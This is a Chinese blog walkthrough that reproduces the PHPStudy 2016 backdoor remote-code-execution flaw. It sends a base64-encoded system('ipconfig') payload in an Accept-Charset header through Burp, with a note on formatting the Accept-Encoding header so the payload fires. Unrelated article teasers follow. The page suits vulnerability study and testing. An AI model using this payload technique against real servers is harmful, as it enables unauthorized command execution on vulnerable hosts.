程序员经验分享-hwhale

phpstudy2016 RCE漏洞验证

2023-11-12

文章目录

漏洞描述

PHPStudyRCE(Remote Code Execution),也称为phpstudy_backdoor漏洞,是指PHPStudy软件中存在的一个远程代码执行漏洞。

漏洞验证

打开phpstudy2016,用bp自带的浏览器访问www目录下的phpinfo.php文件,访问后结果如下:
在这里插入图片描述

然后在bp中将抓到的数据包发送到repeater模块:

在这里插入图片描述

将system(‘ipconfig’);命令做base64编码:

system('ipconfig');

编码后

c3lzdGVtKCdpcGNvbmZpZycpOw==

在这里插入图片描述

然后在repeater模块添加Accept-Charset: 字段,将base64编码放入:

Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==

注意Accept-Encoding字段中gzip和deflate之间不能有空格!

在这里插入图片描述

去掉空格后点击send发送,ipconfig命令被执行:

在这里插入图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

漏洞复现

网络安全

漏洞

RCE

phpstudy2016 RCE漏洞验证 的相关文章

  • FISCO BCOS(三十六)———Python Sdk window环境部署及应用开发

    1 环境要求 Python环境 python 3 6 3 3 7 3 最好是3 7 3 因为我是 FISCO BCOS节点 可以直接建链 可以是节点前置 也可以是一键部署 2 安装python 2 1 python下载地址 https ww

  • COM 组件设计与应用(十一)

    COM 组件设计与应用 十一 IDispatch 及双接口的调用作者 杨老师 下载源代码一 前言 前段时间 由于工作比较忙 没有能及时地写作 其间收到了很多网友的来信询问和鼓励 在此一并表示感谢 咳 我也需要工作来养家糊口呀 上回书介绍了两

  • linux系统函数总结(一)

    realpath include

  • c陷阱与缺陷

    第一章 词法陷阱 1 这一章没有太多 干货 唯一比较有趣的就是 1 3 语法分析中的 贪心法 所讲内容 这个 贪心 就是编译器会读入字符 如果能新读入的字符和之前所读入字符能组成符号 则编译器会继续读入下一个字符 直到读入的字符不能和之前的

  • BLE MESH组网(五)配置BLE MESH

    BLE MESH 五 配置BLE MESH 前言 概述 配置协议 供应程序 信标 邀请 交换公钥 前言 2017 年 5 月 全球最臭名昭著的勒索软件 WannaCry 在全球范围内积极攻击计算机 劫持用户数据索要赎金 这次攻击影响了 15

  • kafka性能参数和压力测试揭秘

    上一篇文章介绍了Kafka在设计上是如何来保证高时效 大吞吐量的 主要的内容集中在底层原理和架构上 属于理论知识范畴 这次我们站在应用和运维的角度 聊一聊集群到位后要怎么才能最好的配置参数和进行测试性能 Kafka的配置详尽且复杂 想要进行

  • 空间坐标系坐标变换及matlab代码实现

    1 前言 下文中描述坐标系使用了英文的简写 OS Origin Space 原始空间坐标系 NS New Space 新空间坐标系 2 坐标变换介绍 为了解决这个问题 可以利用机器人学中的位姿变换来进行描述 以下依次介绍坐标平移 坐标旋转和

  • j2ee mysql struts_Java新手如何学习Spring、Struts、Hibernate三大框架?

    如何通过java开发培训成为java技术抓紧 这里面java的基础语法很重要 同时 要从基础开始到java的深度编程 这里提炼出一些技术知识点 来避免一些误区 拉勾IT课小编为大家分解 这里面的一些技巧 1 避免使用正则表达式 正则表达式给

  • K8S第三讲 Kubernetes集群配置网络插件

    在Kubernetes集群中 网络插件是必需的 因为它们为Pod提供了可访问的IP地址 并确保它们能够相互通信 Kubernetes支持多种网络插件 包括Calico Flannel Weave Net等 这里以Calico为例介绍如何配置

随机推荐

  • 通过数组下标获取值都有哪些方法_js: 数组

    定义 数组是一种有序数据结合 创建方式 直接量 var a 1 2 构造函数 var b new Array 1 2 注意 构造函数中只传一个参数会变成长度 数组API var arr 0 1 2 push 添加元素 返回length 并把

  • Vue 艺术字体下载、设置

    1 本人常用的下载地址 https zh fonts2u com 2 找到你需要的字体点击下载 3 下载完之后有一个ttf文件 4 在vue里面 我个人在assets文件下创建一个文件夹 叫什么名字都行 找到你下载的ttf文件 把ttf文件

  • 【笔记】c编译执行过程

    c语言 c gt exe 过程 E 预处理 把 h和 c展开形成一个文件 宏定义直接替换 库文件 头文件打开 生成 i文件 gcc E hello c o hello i S 编译 i生成一个汇编代码文件 s gcc S hello i o

  • ES6 Symbol

    概览 const mySymbol Symbol mySymbol console log mySymbol Symbol mySymbol console log mySymbol Symbol mySymbol false consol

  • 收藏!生物信息学数据库大全,全网最全收集整理!

    综合数据库 INSD 国际核酸序列数据库 International Nucleotide Sequence Databank 由日本的DDBJ 欧洲的EMBL和美国的GenBank三家各自建立和共同维护 EMBL库 欧洲分子生物学实验室的

  • MySQL 全面知识总结

    基础 Mysql存储特点 Mysql存储数据以数据页为最小单位 在同一个数据页中 数据按照主键 连续存储 如果没有主键 则按照Mysql维护的 ROW ID 来连续存储 数据页和数据页之间以双向链表关联 数据和数据之间以单向链表关联 SQL

  • Go基础(复杂类型):结构体

    结构体 一个结构体 struct 就是一个字段的集合 而 type 的含义跟其字面意思相符 下面来写一个简单的例子 package main import fmt 一个结构体就是一个字段的集合 type Vertex struct X in

  • MATLAB机器人工具箱1-位姿描述及轨迹

    1 位姿描述 1 1 二维空间位姿描述 开启机器人工具箱 startup rvc 代码 clc clear 开启机器人工具箱 startup rvc 二维平面内的位姿描述 T1 SE2 1 2 30 pi 180 建立齐次坐标变换 代表 1

  • SSM毕业设计分享 疫情防控物业管理系统

    文章目录 1 项目简介 2 实现效果 2 1 界面展示 3 设计方案 3 1 概述 3 2 开发环境 3 3 系统结构设计 4 项目获取 1 项目简介 Hi 各位同学好呀 这里是M学姐 今天向大家分享一个今年 2022 最新完成的毕业设计项

  • C++ 函数重载(多态)、函数模板

    内容均出自 C primer plus 本文仅为个人理解总结所用 若有不明欢迎站内私信交流 若发现文中错漏之处 期待不吝赐教站内私信 一 函数重载 多态 先上定义 C Premer Plus page276 函数多态是C 在C语言的基础上新

  • iOS平台Socket编程实践(一)

    iOS平台Socket编程实践 关于TCP Socket编程基础可以参看我的 我所不知道的TCP Socket编程 系列文章 iOS平台Socket编程主要内容及辅助工具 1 TCP协议编程 2 UDP协议编程 3 WireShark抓包辅

  • QT5.15.2安装教程

    QT属于开源项目 从QT5 15开始都统一为下载器在线安装的方式 安装较为简单 1 下载好在线下载器 QT对5 15以及以上版本已经停止提供离线安装包 但是 5 15以及以上版本都支持在线安装 清华镜像 Qt5 15及其以上版本在https

  • DCIC2021学习笔记 - TASK 2 结果提升

    采用建议库函数结果为17 4530 经过KNN结果为17 51 提升不大 尝试调研滴滴出行调度方案后修改结果 To Do List 调研论文 OM 滴滴 在线司机调度系统的实践研究 OM 北邮X滴滴 基于最小车队的动态车辆调度

  • 超实用的Mac风扇控制系统:Macs Fan Control Pro mac中文版

    Macs Fan Control Pro Mac中文激活版是专为mac用户开发的一款Mac风扇控制系统 用户可以监控电脑中的显卡温度 以及风扇等等 可以帮你解决mac风扇噪音问题 解决mac发热问题 而且支持自定义风扇转速策略设置 非常好用

  • 面试准备计划

    C 知识点 基本概念 关键字 函数底层实现 Linux 指令 makefile c make 数据库 SQL 基本语法 存储过程 触发器 事务 索引等底层实现 存储引擎 非关系型数据库redis mapreduce HDFS 操作系统 进程

  • 从零开始搭建自己的VueJS2.0+ElementUI单页面网站(一、环境搭建)

    前言 VueJS可以说是近些年来最火的前端框架之一 越来越多的网站开始使用vuejs作为前端框架 vuejs轻量 简单的特性使得前端开发变得更加简易 而基于vuejs的前端组件库也越来越多 我们今天使用的ElementUI 是饿了么团队开发

  • select下拉列表级联

    原文地址 http blog csdn net symgdwyh article details 5432582

  • Python学习(十)之数字(Number)、字符串(String)

    文章目录 一 Python3 数字 1 整型的不同进制 2 数据类型的转换 3 数字运算 4 数学函数 5 随机数函数 6 三角函数 7 数字常量 二 Python3 字符串 1 对字符串的访问 2 字符串运算符 3 转义字符 4 字符串格

  • GLP(Grafna +Loki +Promtail)日志可视化企业级实战

    文章目录 1 效果展示 Loki 指标展示 日志展示 内存分析案例 业务请求量分析统计 自由探索日志 0 简介 grafana学习 自定义查询按钮 为什么不是ELK ELK Loki 1 loki聚合组件 架构

  • phpstudy2016 RCE漏洞验证

    文章目录 漏洞描述 漏洞验证 漏洞描述 PHPStudyRCE Remote Code Execution 也称为phpstudy backdoor漏洞 是指PHPStudy软件中存在的一个远程代码执行漏洞 漏洞验证 打开phpstudy2

热门标签